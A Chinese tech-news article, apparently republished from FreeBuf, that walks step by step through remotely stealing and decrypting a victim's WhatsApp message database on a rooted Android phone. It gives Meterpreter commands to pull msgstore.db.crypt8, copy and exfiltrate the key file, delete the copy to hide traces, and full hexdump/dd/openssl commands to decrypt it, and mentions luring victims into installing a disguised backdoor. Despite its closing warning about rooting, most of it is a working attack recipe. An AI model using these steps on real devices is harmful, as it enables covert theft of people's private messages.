攻击者是如何一步步拿下你的WhatsApp数据库

安全 数据安全 黑客攻防
针对已root过的安卓移动设备,本文主要讲解远程攻击并解密WhatsApp数据库的详细过程。另外,这再一次提醒我们,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下。

针对已root过的安卓移动设备,本文主要讲解远程攻击并解密WhatsApp数据库的详细过程。另外,这再一次提醒我们,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下。

[[151157]]

几小时前,网络上发布了一个有趣的文章《如何远程破解并解密WhatsApp数据库[ROOT] 》,文中解释了如何从一个root过的安卓系统中提取并解密WhatsApp数据库。尽管通常情况下WhatsApp非常安全,但对安卓设备的root处理将可能使用户暴露在攻击风险之中。

接下来,就让我们一步一步看看作者(使用匿名F.E.A.R.)所提出的攻击场景。

步骤1:利用并获取安卓设备的访问权限

正如这篇指南中所解释的,如果安卓设备通过使用Meterpeter命令进行了root,那么这一阶段将变得很简单。

攻击者是如何一步步拿下你的WhatsApp数据库 

攻击者是如何一步步拿下你的WhatsApp数据库

为了攻击并解密WhatsApp数据库,攻击者需要一个存在于数据文件夹中的密钥文件,而访问该文件的唯一途径就是拥有root权限。此外,该密钥文件是解密WhatsApp数据库所必不可少的。

步骤2:下载数据库

使用下列命令通过Meterpreter下载数据库:

cd /
cd /sdcard/WhatsApp
ls (打印当前目录)
cd Databases

下载msgstore.db.crypt8 (这里需要耗费一些时间,可能很长)

攻击者是如何一步步拿下你的WhatsApp数据库

 

步骤3:提取解密密钥

解密WhatsApp数据库所必需的密钥文件中存储了两套解密密钥,即实际的加密密钥K和一个名为IV的初始化向量。值得一提的是,WhatsApp密钥文件存储在一个安全的位置。下面这些都是提取密钥文件的命令:

shell
su(超级用户访问或仅仅进行提权)

正如F.E.A.R.所解释的,这是最困难的部分,特别是如果目标手机用户是有经验且熟练的用户,因为他必须已经安装SuperSU应用程序。

如何诱导受害者安装SuperSU?

可以看一下用户bart发布的这篇教程,里面解释了如何伪装一个后门应用程序。不过,如果下列场景中的受害者并非是一个有经验的或熟练的用户,那么事情将变得更加简单:

1、他们没有安装SuperSU应用程序。

2、对于新安装的应用,他们没有改变设置为PROMPT,而并非GRANT。

执行以下命令来访问密钥文件夹,并提取解密密钥。

cd /
cd /data/data
ls
cd com.whatsapp ls
cd files
ls cp key /sdcard/Download (意思是将文件key拷贝到/sdcard/Download文件夹)

步骤4:下载解密密钥文件到root目录

下载提取的密钥文件到root目录,该目录中还含有加密的WhatsApp数据库:

cd /
cd /sdcard/Download
download key
rm key (确保你删除了key文件)

步骤5:解密WhatsApp数据库

文章中报道了2种不同的方法来解密WhatsApp:

(1)使用Linux命令:每次复制并粘贴一条命令,不要将它们写成一个脚本文件,否则它将不能正常工作:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
gzip -cdq msgstore.gz > msgstore.db

如果第4行命令不能工作,那么就按下面的指令操作:

hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316
hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (从第1条指令中粘贴文本文档) -iv (从第2条指令中粘贴文本文档) > msgstore.gz

(2)第二种方法基于简单的Windows WhatsApp查看器应用程序,可以看一下原文。

这是又一次的教训,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下。

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2018-07-13 15:36:52

2024-08-30 08:30:29

CPU操作系统寄存器

2024-09-30 09:56:59

2017-01-19 21:08:33

iOS路由构建

2017-12-25 11:50:57

LinuxArch Linux

2024-08-06 09:29:54

程序机器指令字符串

2024-02-04 09:45:56

2019-03-05 14:09:27

Docker存储容器

2019-07-09 15:23:22

Docker存储驱动

2020-11-09 07:35:59

MySQL数据库业务

2009-12-17 16:36:23

无线路由设置密码

2018-12-24 10:04:06

Docker存储驱动

2019-04-01 10:15:02

2010-03-04 16:28:17

Android核心代码

2017-01-06 15:13:25

LinuxVim源代码

2015-07-27 16:06:16

VMware Thin虚拟化

2016-11-02 18:54:01

javascript

2024-06-27 08:30:36

内存扩容堆区

2024-11-11 10:28:33

操作系统Unix系统

2011-05-10 10:28:55

点赞
收藏

51CTO技术栈公众号